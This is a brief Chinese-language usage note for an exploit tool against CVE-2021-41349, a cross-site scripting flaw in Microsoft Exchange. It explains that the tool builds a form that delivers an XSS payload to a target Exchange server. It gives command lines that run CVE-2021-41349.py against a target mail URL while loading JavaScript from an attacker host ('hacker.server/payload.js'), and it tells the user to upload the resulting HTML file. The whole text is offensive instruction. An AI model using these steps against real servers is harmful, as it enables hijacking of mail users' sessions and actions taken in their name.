利用:CVE-2021-41349
此利用工具会创建一个表单,用于向目标 Exchange 服务器提交 XSS 载荷。
你需要创建一个包含你所需操作的 js 文件。
js 载荷,并将其上传到某个位置。CVE-2021-41349.py。python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
或者:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html 文件上传到服务器。